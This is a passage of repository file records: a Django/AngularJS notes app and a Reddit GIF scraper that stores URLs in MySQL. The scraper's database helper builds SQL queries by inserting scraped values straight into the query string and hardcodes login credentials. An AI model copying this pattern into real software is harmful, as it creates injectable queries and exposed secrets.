"34a5c4e8b8e293a4950eea7e823032242f1c8440", "content_id": "9f62ca74b3dbd0c09319f5524279389ec4a1a614", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19, "license_type": "no_license", "max_line_length": 18, "num_lines": 1, "path": "/DjangoApp/quicksilver/decorations/__init__.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ 
= 'kdj'\n" }, { "alpha_fraction": 0.4833029806613922, "alphanum_fraction": 0.48512446880340576, "avg_line_length": 35.599998474121094, "blob_id": "5c0df4e03088ff5bcd69cd93558c4c0f0ba2ca7a", "content_id": "1c45a573b4e1136d74c20097419691fbb51d74d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1647, "license_type": "no_license", "max_line_length": 104, "num_lines": 45, "path": "/DjangoApp/static/js/quicksilver/app.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n 'use strict';\n\n angular.module('quicksilver', ['ngRoute', 'quicksilver.controller', 'quicksilver.service']);\n angular.module('quicksilver.controller' , ['summernote', 'ng-context-menu', 'quicksilver.service']);\n angular.module('quicksilver.service' , []);\n\n angular\n .module('quicksilver')\n .constant('myConfig', {\n })\n .config([\n '$routeProvider', '$httpProvider', '$filterProvider',\n function ($routeProvider, $httpProvider, $filterProvider) {\n 'use strict';\n\n console.debug(\"config\");\n $httpProvider.defaults.xsrfCookieName = 'csrftoken';\n $httpProvider.defaults.xsrfHeaderName = 'X-CSRFToken';\n\n $filterProvider.register('shortcut', function () {\n return function (text, len) {\n if ( text.length > len ) {\n var head = (len/2) + (len%2);\n var tail = len - head;\n return text.substr(0, head) + \" ... \" + text.substr(-tail);\n }\n return text;\n };\n });\n\n $routeProvider\n .when(\"/note\", {templateUrl: 'quicksilver/tpl/note', controller: 'noteCtrl'});\n }])\n .run(function() {\n location.href = \"#/note\";\n });\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n" }, { "alpha_fraction": 0.6694444417953491, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 28.189189910888672, "blob_id": "37f284568a55df7b940de1156ea859f8a595a0a3", "content_id": "546c86cda6c77b42b50338f94f186cea42ed79b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1212, "license_type": "no_license", "max_line_length": 94, "num_lines": 37, "path": "/README.md", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "# Learning Python\n\n![demo](https://raw.githubusercontent.com/daejoon/learning-python/master/docs/quicksilver.png)\n\nDjanggo와 AngularJs를 이용한 노트 앱입니다.\n\n시작은 파이썬 배워보기 위한 프로젝트인데 어째 AngularJS 쪽으로 무게중심이 가버렸습니다.\n\n## Server-Side Stack\n- [Python](https://www.python.org/) `2.7.14`\n- [Django](https://www.djangoproject.com/) `1.11.10`\n\n## Client-Side Stack\n- [jQuery](http://jquery.com)\n- [Underscorejs](http://underscorejs.org/)\n- [Suummernote](http://summernote.org/)\n- [Bootstrap](http://getbootstrap.com/)\n- [font-awesome](http://fortawesome.github.io/Font-Awesome/)\n- [AngularJS](https://www.angularjs.org/)\n- [Angular-summernote](https://github.com/summernote/angular-summernote)\n- [Angular-ui-bootstrap](https://github.com/angular-ui/bootstrap)\n- [ng-context-menu](https://github.com/ianwalter/ng-context-menu)\n\n## 실행방법\n- `DjangoApp` 폴더로 이동\n ```\n $ cd DjangoApp\n ```\n- `python manage.py migrate` 입력\n ```\n $ python manage.py migrate\n ```\n- `python manage.py runserver 8888` 입력\n ```\n $ python manage.py runserver 8888\n ```\n- 브라우저에서 `http://localhost:8888` 입력\n" }, { "alpha_fraction": 0.8035714030265808, "alphanum_fraction": 0.8035714030265808, "avg_line_length": 
17.66666603088379, "blob_id": "e63be1b6a98c7c6c85556d0f2b3e985131858657", "content_id": "c7a7b840e3bbf37d403b8dc9dd491a548b3d0a4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 45, "num_lines": 9, "path": "/DjangoApp/quicksilver/admin.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom quicksilver.models import NoteBook, Note\n\n\n# Register your models here.\n\nadmin.site.register(NoteBook)\nadmin.site.register(Note)\n" }, { "alpha_fraction": 0.5667556524276733, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 36.45000076293945, "blob_id": "cf408aa25ea9da2ba420343116295463b95e10a0", "content_id": "aedeb70cc1fda98138972f4f5983e1ad28b969ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 114, "num_lines": 40, "path": "/DjangoApp/quicksilver/migrations/0001_initial.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Note',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('content', models.TextField(null=True)),\n ('isDelete', models.BooleanField(default=False)),\n ('regDate', models.DateTimeField(default=django.utils.timezone.now)),\n ('modifyDate', models.DateTimeField(default=django.utils.timezone.now)),\n ],\n ),\n migrations.CreateModel(\n name='NoteBook',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('isDelete', models.BooleanField(default=False)),\n ('regDate', models.DateTimeField(default=django.utils.timezone.now)),\n ('modifyDate', models.DateTimeField(default=django.utils.timezone.now)),\n ],\n ),\n migrations.AddField(\n model_name='note',\n name='notebook',\n field=models.ForeignKey(to='quicksilver.NoteBook'),\n ),\n ]\n" }, { "alpha_fraction": 0.643552303314209, "alphanum_fraction": 0.643552303314209, "avg_line_length": 53.79999923706055, "blob_id": "1f41d702a7a343a5cf0bef324632c705af003618", "content_id": "80cd7e4949fc50a6d492dce52976aceea12e19a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "no_license", "max_line_length": 123, "num_lines": 15, "path": "/DjangoApp/quicksilver/urls.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom quicksilver.views import HomeView, AngularTplView, NotebookListView, TrashView, RecentNoteView, NoteListView, NoteView\n\n\nurlpatterns = [\n url(r'^$', HomeView.as_view(), name=\"home\"),\n url(r'^tpl/?(?P<page_name>.+)$', AngularTplView.as_view(), name=\"angular_tpl\"),\n url(r'^notebook/?(?P<notebook_id>-?\\d+)?$', NotebookListView.as_view(), name=\"notebookList\"),\n url(r'^trash/?(?P<note_id>-?\\d+)?$', TrashView.as_view(), name='trash'),\n url(r'^recentnote/?$', RecentNoteView.as_view(), name='recentnote'),\n url(r'^notelist/?(?P<notebook_id>-?\\d+)$', NoteListView.as_view(), 
name='notelist'),\n url(r'^notelist/search/?(?P<search_text>.+)$', NoteListView.as_view(), name='notelist_search'),\n url(r'^note/?(?P<note_id>-?\\d+)?$', NoteView.as_view(), name='note'),\n]\n" }, { "alpha_fraction": 0.550000011920929, "alphanum_fraction": 0.550000011920929, "avg_line_length": 28, "blob_id": "681e45ae51a41303a5b10d0e1861bacffb4f2b41", "content_id": "b5624951f3a49d9f5b38d486792f44400979eb5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 42, "num_lines": 11, "path": "/DjangoApp/quicksilver/decorations/set_variable.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\n\ndef setTplViewVariable(name, value):\n def decorator_func(func):\n def wrapper_func(*args, **kwargs):\n ret = func(*args, **kwargs)\n if isinstance(ret, dict):\n ret[name] = value\n return ret\n return wrapper_func\n return decorator_func\n\n" } ]
15
Jonathanlinus/WebBlocaker
https://github.com/Jonathanlinus/WebBlocaker
10792e0665f9fd0f1ea6149ecff7ac73aa20f0f4
5bbb9d660c956c862ac5d135b0ae9db9af8b30cf
fdcf7421691891b9bcfa8e6ca671a7283f215da5
refs/heads/master
2020-04-21T23:45:54.420089
2019-02-10T11:32:28
2019-02-10T11:32:28
169,956,722
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.6979591846466064, "avg_line_length": 21.090909957885742, "blob_id": "cc2cda6fdc3feee55b5f9a594c8be44ff48b3324", "content_id": "f5f96cfd4940e6065a8bae564ead437c225004aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/website_blocker.py", "repo_name": "Jonathanlinus/WebBlocaker", "src_encoding": "UTF-8", "text": "import time\nfrom datetime import datetime as dt\n\n#we can use r:\"C:\\windows....\nhost_path=\"C:\\\\Windows\\\\system32\\\\drivers\\\\etc\\\\hosts\"\nredirect=\"127.0.0.1\"\nwebsite_list=[\"www.facebook.com\", \"facebook.com\"]\n\nwhile True:\n\tprint(1)\n\ttime.sleep(5)\n\t\n" } ]
1
coderboom/UheDev
https://github.com/coderboom/UheDev
60fe25be9e8cf4bc9a879ab4f2659494c1c064d1
3b7e7edd39726055673984ce16fc2dd6e1636f2a
fddc40d527ac5213a124a1d866b9bf0202a91653
refs/heads/master
2020-03-22T15:54:27.095687
2018-07-09T14:25:04
2018-07-09T14:25:04
140,252,620
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.778181791305542, "alphanum_fraction": 0.778181791305542, "avg_line_length": 26.5, "blob_id": "c66ef1a8217f0e60a9e8f83420b25eebbb07c8d4", "content_id": "3f9f9b8b405847ba2cd3d072f75d8ad1dfa6ab74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/DevPurchase/LoginModule/TestRun.py", "repo_name": "coderboom/UheDev", "src_encoding": "UTF-8", "text": "import HTMLTestRunner\nfrom DevPurchase.LoginModule import LoginTestCase\nimport os\nimport unittest\n# get the directory path to output report file\ndir = os .getcwd()\n\n# 需要测试的测试用例\nLogin_Test = unittest.TestLoader().loadTestsFromTestCase(LoginTestCase.TestLogin)\n# 加载所有的 test case\ntest_suite = unittest.TestSuite([Login_Test, ])\n\n# open the report file\noutputfile = open(dir+'\\\\SeleniumTestLogin.html', 'wb')\n\n# 配置\nrunner = HTMLTestRunner.HTMLTestRunner(\n stream=outputfile, title=\"登陆测试\", description='Acceptance Tests')\n# 开始运行\nrunner.run(test_suite)\n" }, { "alpha_fraction": 0.2978723347187042, "alphanum_fraction": 0.2978723347187042, "avg_line_length": 23, "blob_id": "69743c2d63ecea8b76eb91842e3b9d2586013fff", "content_id": "c4bde544a61d280ae24e0fbadb16d33de8c95a36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/DevPurchase/Webtools/Web.py", "repo_name": "coderboom/UheDev", "src_encoding": "UTF-8", "text": "import abc\nprint('---------------------------')" }, { "alpha_fraction": 0.6274864673614502, "alphanum_fraction": 0.6374322175979614, "avg_line_length": 34.11111068725586, "blob_id": "fca9d81f3fa16973d533f4fe51342e0e9fe13c11", "content_id": "66d65260cc27dab6d8d1347426c08872bb862ee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2246, "license_type": "no_license", "max_line_length": 105, "num_lines": 63, "path": "/DevPurchase/LoginModule/LoginTestCase.py", "repo_name": "coderboom/UheDev", "src_encoding": "UTF-8", "text": "import unittest\nimport selenium\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\n\n\nclass TestLogin(unittest.TestCase):\n def setUp(self):\n self.browser = webdriver.Chrome()\n self.browser.implicitly_wait(3)\n self.base_url = 'http://dev.uhetrip.com:13215/signin?ref=root'\n\n def test_login(self):\n browser = self.browser\n browser.get(self.base_url)\n browser.maximize_window()\n browser.implicitly_wait(5)\n\n user_name = 'lisisi'\n user_pwd = 'aa2345'\n\n user_name_element = 'username'\n user_pwd_element = 'password'\n identify_code_element = '//*[@id=\"siginBoxCard\"]/div[2]/form/div[3]/div/div[1]/div/div/div/input'\n loading_btn_element = 'isloading_btn'\n submenu_title_element = '/html/body/div[1]/div/div/div/div[2]/ul/li[4]/div'\n \n user_name_input = browser.find_element_by_id(user_name_element)\n user_name_input.is_displayed()\n user_pwd_input = browser.find_element_by_id(user_pwd_element)\n user_pwd_input.is_displayed()\n identify_code_input = browser.find_element_by_xpath(\n identify_code_element)\n identify_code_input.is_displayed()\n loading_btn_click = browser.find_element_by_id(loading_btn_element)\n 
loading_btn_click.is_displayed()\n\n user_name_input.send_keys(user_name)\n user_pwd_input.send_keys(user_pwd)\n identify_code_input.send_keys('0328')\n loading_btn_click.click()\n\n browser.implicitly_wait(10)\n # submenu_title_text = browser.find_element_by_xpath(\n # '/html/body/div[1]/div/div/div/div[2]/ul/li[4]/div').getText()\n # 定位到标签,用 .text获取text\n submenu_title_text = browser.find_element_by_xpath(\n submenu_title_element).text\n if submenu_title_text == user_name:\n print('登陆成功')\n else:\n print('登陆失败')\n \n def tearDown(self):\n self.browser.quit()\n\n\nif __name__ == '__main__':\n unittest.main()\n" } ]
3
TanyaKalistruk/TheoryCompLab2
https://github.com/TanyaKalistruk/TheoryCompLab2
cc84ec2b17ad81144bbd5a139ef28ee6e9d329b7
7aca2f18685fc4820f2e24f03f4b8872d89822a1
9252ff35391c9c6b79386fe1426de56c2e30a9db
refs/heads/master
2022-04-22T20:38:07.081088
2020-04-25T13:54:19
2020-04-25T13:54:19
255,076,958
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40329834818840027, "alphanum_fraction": 0.45327335596084595, "avg_line_length": 24.012500762939453, "blob_id": "662b0e2c31ed23534dc283192fba1c615ac16300", "content_id": "f118e7a3ccacbf87c218fe4ed785a33b72974be3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 90, "num_lines": 80, "path": "/lab3/main_part.py", "repo_name": "TanyaKalistruk/TheoryCompLab2", "src_encoding": "UTF-8", "text": "import os\n\nmeaning = (\"KeyWordCancel\", \"KeyWordCall\", \"FourSingNumber123\")\n\nmatrix = (\n (1, 4, 0, 0, 0, 0, -4),\n (2, 4, 0, 0, 0, 0, -4),\n (3, 4, 0, 0, 0, 0, -4),\n (-1, 4, 0, 0, 0, 0, -4),\n (1, 4, 5, 0, 0, 0, -4),\n (1, 4, 0, 6, 7, 0, -4),\n (1, 4, 0, -2, 0, 0, -4),\n (1, 8, 0, 0, 0, 0, -4),\n (1, 4, 5, 0, 0, 9, -4),\n (1, 4, 0, -3, 0, 0, -4)\n)\n\n\ndef classify_symbol(symbol: str) -> int:\n \"\"\"Return the class of passed symbol\"\"\"\n if symbol in ('1', '2', '3'):\n return 0\n elif symbol == 'c':\n return 1\n elif symbol == 'a':\n return 2\n elif symbol == 'l':\n return 3\n elif symbol == 'n':\n return 4\n elif symbol == 'e':\n return 5\n else:\n return 6\n\n\ndef write_to_file(message, *args):\n \"\"\"Write messages to a file\"\"\"\n with open(\"output.txt\", \"a+\") as file:\n file.write(message)\n file.write('\\n')\n for arg in args:\n file.write(arg)\n file.write('\\n')\n\n\ndef analyze(string: str):\n \"\"\"Analyze string from file\"\"\"\n st = 0\n i = 0\n begin = i\n while i < len(string):\n symbol = string[i]\n cl = classify_symbol(symbol)\n st = matrix[st][cl]\n if st == 1 or st == 4 or st == 0:\n begin = i\n if st == 5:\n begin = i - 1\n i += 1\n if st == -1 or st == -2 or st == -3:\n to_write = string[begin:i]\n write_to_file(\"<{token}, {type}>\".format(token=meaning[st], type=to_write))\n st = 0\n begin = i\n elif st == -4:\n st = 0\n begin = i\n\n\nif __name__ == '__main__':\n line_num = 1\n with open(\"input.txt\", \"r\") as line_to_read:\n lines = line_to_read.readlines()\n os.remove(\"output.txt\")\n for line in lines:\n line_without_eof = line.split('\\n')[0]\n write_to_file(\"\", \"Line number %i\" % line_num, \"The string is:\", line_without_eof)\n analyze(line_without_eof)\n line_num += 1\n" }, { "alpha_fraction": 0.4979720115661621, "alphanum_fraction": 0.5032055377960205, "avg_line_length": 39.439151763916016, "blob_id": "d83bc84e763f4d3425ee9821ba2ad4a9fceaa306", "content_id": "5a14215d27a0bd30e4501bd1c12760bc1edcbaf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7643, "license_type": "no_license", "max_line_length": 114, "num_lines": 189, "path": "/leks_analyzator/leks_analyzator.py", "repo_name": "TanyaKalistruk/TheoryCompLab2", "src_encoding": "UTF-8", "text": "import os\n\nkey_word_type = 'KeyWordType'\nkey_word_int = 'KeyWordInt'\nkey_word_record = 'KeyWordRecord'\nkey_word_end = 'KeyWordEnd'\nsign_equal = 'SignEqual'\nsign_colon = 'SignColon'\nsign_semicolon = 'SignSemicolon'\nid_alpha = 'IdAlpha'\nid_alphabet_ab12 = 'IdAlphabetAB12'\n\n\nclass LeksAnaliz:\n\n def __init__(self, line: int, string: str):\n self.string = string\n self.dict_defines = {key_word_type: 'type',\n key_word_int: 'int',\n key_word_record: 'record',\n key_word_end: 'end',\n sign_equal: '=',\n sign_colon: ':',\n sign_semicolon: ';',\n id_alpha: 'alpha',\n id_alphabet_ab12: ['a', 'b', '1', '2']}\n self.line = line\n self.position = -1\n self.start_position = 0\n\n def get_token(self):\n 
\"\"\"Print word/sing/id and define it\"\"\"\n self.position += 1\n try:\n symbol = self.string[self.position]\n if symbol == 't':\n self.check_key_word_type()\n elif symbol == 'i':\n self.check_key_word_int()\n elif symbol == 'r':\n self.check_key_word_record()\n elif symbol == 'e':\n self.check_key_word_end()\n elif symbol in ('a', 'b'):\n self.check_ids()\n elif symbol == ';':\n self.write_to_file(\"<{token}, {type}>\".format(token=symbol, type=sign_semicolon))\n self.get_token()\n elif symbol == ':':\n self.write_to_file(\"<{token}, {type}>\".format(token=symbol, type=sign_colon))\n self.get_token()\n elif symbol == '=':\n self.write_to_file(\"<{token}, {type}>\".format(token=symbol, type=sign_equal))\n self.get_token()\n elif symbol == ' ':\n self.get_token()\n else:\n self.error(\"Unknown symbol {}\".format(symbol))\n except:\n pass\n\n def error(self, error):\n \"\"\"Write found error\"\"\"\n self.write_to_file(\n \"Error in line {line}, position {position}, message: {message}\".format(line=self.line,\n position=self.position,\n message=error),\n \"\", \"\")\n\n def check_alpha_id(self, start_position):\n \"\"\"Checks if it is alpha id\"\"\"\n word_to_check = self.dict_defines[id_alpha]\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=self.string[start_position:self.position + 1],\n type=id_alpha))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not an id 'alpha'\")\n\n def check_key_word_end(self):\n \"\"\"Checks if it is a key word end\"\"\"\n word_to_check = self.dict_defines[key_word_end]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=word_to_check, type=key_word_end))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'end'\")\n\n def check_key_word_int(self):\n \"\"\"Checks if it is key word int\"\"\"\n word_to_check = self.dict_defines[key_word_int]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=word_to_check, type=key_word_int))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'int'\")\n\n def check_key_word_record(self):\n \"\"\"Checks if it is a key word record\"\"\"\n word_to_check = self.dict_defines[key_word_record]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=word_to_check, type=key_word_record))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'record'\")\n\n def check_ids(self):\n \"\"\"Check it is id alpha or id in alphabet {a, b, 1, 2}\"\"\"\n start_position = self.position\n self.position += 1\n 
symbol = self.string[self.position]\n if symbol == 'l' and self.string[start_position] == 'a':\n self.check_alpha_id(start_position)\n else:\n while symbol in self.dict_defines[id_alphabet_ab12]:\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.write_to_file(\"<{token}, {type}>\".format(token=self.string[start_position:self.position],\n type=id_alphabet_ab12))\n self.position -= 1\n self.get_token()\n\n def check_key_word_type(self):\n \"\"\"Checks if it is type key word\"\"\"\n word_to_check = self.dict_defines[key_word_type]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position]:\n if self.position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=self.string[start_position:self.position + 1],\n type=key_word_type))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'type'\")\n\n @staticmethod\n def write_to_file(message, *args):\n \"\"\"Write messages to a file\"\"\"\n with open(\"output.txt\", \"a+\") as file:\n file.write(message)\n file.write('\\n')\n for arg in args:\n file.write(arg)\n file.write('\\n')\n\n\nif __name__ == '__main__':\n line_num = 1\n with open(\"input.txt\", \"r\") as line_to_read:\n lines = line_to_read.readlines()\n os.remove(\"output.txt\")\n for line in lines:\n line_without_eof = line.split('\\n')[0]\n analyzer = LeksAnaliz(line=line_num, string=line_without_eof)\n analyzer.write_to_file(\"Line number %i\" % analyzer.line, \"The string is:\", analyzer.string, \"\")\n analyzer.get_token()\n line_num += 1\n" } ]
2
alexroyar/random-gif
https://github.com/alexroyar/random-gif
07aa8a71e58dc9c7c13458534492b861e1db697f
f255202f3752eed8bd114c2576fd8c871f95d32e
7b5cc6d2ddfe2549b9ffd6faec1287fcb7d731a8
refs/heads/master
2020-06-05T17:23:11.172607
2014-03-29T20:34:28
2014-03-29T20:34:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6242504715919495, "alphanum_fraction": 0.630912721157074, "avg_line_length": 22.46875, "blob_id": "883516c15cb68f9a2d666a5b8cf3cae9fc78bc5f", "content_id": "7ab107501ce313454b2010ecaef9fb81860d3f78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1505, "license_type": "no_license", "max_line_length": 86, "num_lines": 64, "path": "/database/pruebaMYSQL.py", "repo_name": "alexroyar/random-gif", "src_encoding": "UTF-8", "text": "#!usr/bin/python\n# -*- coding: utf-8 -*-\nimport MySQLdb as mdb\n\nDATABASE = 'test'\nTABLE = 'prueba'\n\nclass pruebaMYSQL:\n\t\"\"\"\n\t\tConstructor. No crea la base de datos ni nada.\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.con = mdb.connect('localhost', 'fer', 'fer', DATABASE)\n\t\tself.cursor = self.con.cursor()\n\n\t\"\"\"\n\t\tCrea la tabla de turno. La vacía si existe.\n\t\"\"\"\n\tdef create_table(self, table):\n\t\tquery = \"DROP TABLE IF EXISTS %s\" % (table)\n\t\tself.cursor.execute(query);\n\t\tquery = \"CREATE TABLE %s(url VARCHAR(150) NOT NULL,\" % (table)\n\t\tquery += \"name VARCHAR(150) NOT NULL, PRIMARY KEY (url))\"\n\t\tself.cursor.execute(query);\n\n\t\"\"\"\n\t\tDesconexión de la base de datos.\n\t\"\"\"\n\tdef disconnect(self):\n\t\tif (self.con): self.con.close()\n\n\t\"\"\"\n\t\tAñade un elemento a la base de datos.\n\t\"\"\"\n\tdef insert_into_table(self, url, name):\n\t\ttry:\n\t\t\tquery = \"INSERT INTO %s values(%s, %s)\" % (TABLE, \"'\"+url+\"'\", \"'\"+name+\"'\")\n\t\t\tself.cursor.execute(query)\n\t\texcept Exception as e:\n\t\t\tprint \"Exception:\", e\n\n\t\"\"\"\n\t\tMete valores de relleno para hacer pruebas.\n\t\"\"\"\n\tdef insert_demo(self):\n\t\tfor i in range(0, 10): self.insert_into_table(\"http://%d.gif\" % i, \"IMG_%d.gif\" % i)\n\n\t\"\"\"\n\t\tDevuelve una lista de las filas de la tabla.\n\t\"\"\"\n\tdef get_all_rows(self):\n\t\tif (not self.con):\n\t\t\tprint \"No hay conexión.\"\n\t\t\treturn ()\n\n\t\tquery = \"SELECT * from %s\" % (TABLE)\n\t\tself.cursor.execute(query)\n\t\tres = self.cursor.fetchall()\n\t\treturn res\n\n#ddbb = pruebaMYSQL()\n#ddbb.create_table('prueba')\n#ddbb.insert_demo()\n#print ddbb.get_all_rows()" }, { "alpha_fraction": 0.6734846830368042, "alphanum_fraction": 0.6769767999649048, "avg_line_length": 24.37974739074707, "blob_id": "20597b367db35c90abe22aa740a368b82651ba77", "content_id": "3cbf4271a5fefc6f63210b8c8fdba340c45fa58f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4024, "license_type": "no_license", "max_line_length": 85, "num_lines": 158, "path": "/database/pruebaPRAW.py", "repo_name": "alexroyar/random-gif", "src_encoding": "UTF-8", "text": "#!usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport praw\nimport urllib\nimport time\nimport pruebaMYSQL as ddbb\n\nUSER_AGENT = \"GIF_Collector_Test_v0\" # Nombre de nuestro script.\nLIMIT = 25 # Peticiones que se hacen de golpe.\nSUB_REDDIT = \"gifs\" # Nombre del subreddit a explotar.\nSEPARATOR = \"/\"\t# Separador de URLs.\nPATH = \"images/\" # Ruta provisional de imágenes.\nTIME_SLEEP = 2 \t# Reddit pide dos segundos entre petición y petición.\n\n# Tipos\nGET_TOP_HOUR \t= 1\nGET_TOP_DAY \t= 2\nGET_TOP_WEEK \t= 3\nGET_TOP_MONTH \t= 4\n\ndef get_random_submission(save=False):\n\ttry:\n\t\tdicc = createDiccFromDB()\n\t\tconnection = praw.Reddit(user_agent = USER_AGENT)\n\t\tconnection_ddbb = ddbb.pruebaMYSQL()\n\t\n\t\twhile (True):\n\t\t\ttry:\n\t\t\t\t# Pilla un gif aleatorio.\n\t\t\t\tsub = 
connection.get_subreddit(SUB_REDDIT).get_random_submission()\n\t\t\t\t\n\t\t\t\t# Spliteamos su url.\n\t\t\t\turl = sub.url\n\t\t\t\tname = url.split(SEPARATOR)[-1]\n\n\t\t\t\t# Caso provisional de imágenes de imgur.\n\t\t\t\tif (not \".gif\" in name and \"imgur\" in url):\n\t\t\t\t\tprint \"Imagen especial. Añadimos terminación, a ver si cuela.\"\n\t\t\t\t\tprint name\n\t\t\t\t\tprint url\n\t\t\t\t\tname += \".gif\"\n\t\t\t\t\turl = \"http://i.imgur.com/\" + name\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t# Si no tenemos ya la imagen, la descargamos.\n\t\t\t\tif (not dicc.has_key(url)):\n\t\t\t\t\tdicc[url] = name\n\t\t\t\t\tconnection_ddbb.insert_into_table(url, name)\n\t\t\t\t\tif save: urllib.urlretrieve(url, PATH + name)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tprint \"Exception In:\", exc\n\n\t\t\tfinally:\n\t\t\t\ttime.sleep(2)\n\n\texcept Exception as exc:\n\t\tprint \"Exception Out:\", exc\n\n\tfinally:\n\t\tprint \"Cerramos base de datos en el finally.\"\n\t\tconnection_ddbb.disconnect()\n\ndef get_top(type, num, save=False):\n\ttry:\n\t\tdicc = createDiccFromDB()\n\t\tconnection = praw.Reddit(user_agent = USER_AGENT)\n\t\tconnection_ddbb = ddbb.pruebaMYSQL()\n\n\t\tif (type == GET_TOP_HOUR):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_hour(limit = num)\n\t\telif (type == GET_TOP_DAY):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_day(limit = num)\n\t\telif (type == GET_TOP_WEEK):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_week(limit = num)\n\t\telif (type == GET_TOP_MONTH):\n\t\t\tsubmissions = connection.get_subreddit(SUB_REDDIT).get_top_from_month(limit = num)\n\t\telse:\n\t\t\traise Exception(\"Constante %d no definida.\" % type)\n\n\t\t# Recorremos los objetos Submission.\n\t\tfor sub in submissions:\n\t\t\t# Spliteamos su url.\n\t\t\turl = sub.url\n\t\t\tname = url.split(SEPARATOR)[-1]\n\t\t\t\n\t\t\t# Caso provisional de imágenes de imgur.\n\t\t\tif (not \".gif\" in name and \"imgur\" in url):\n\t\t\t\tprint \"Imagen especial. 
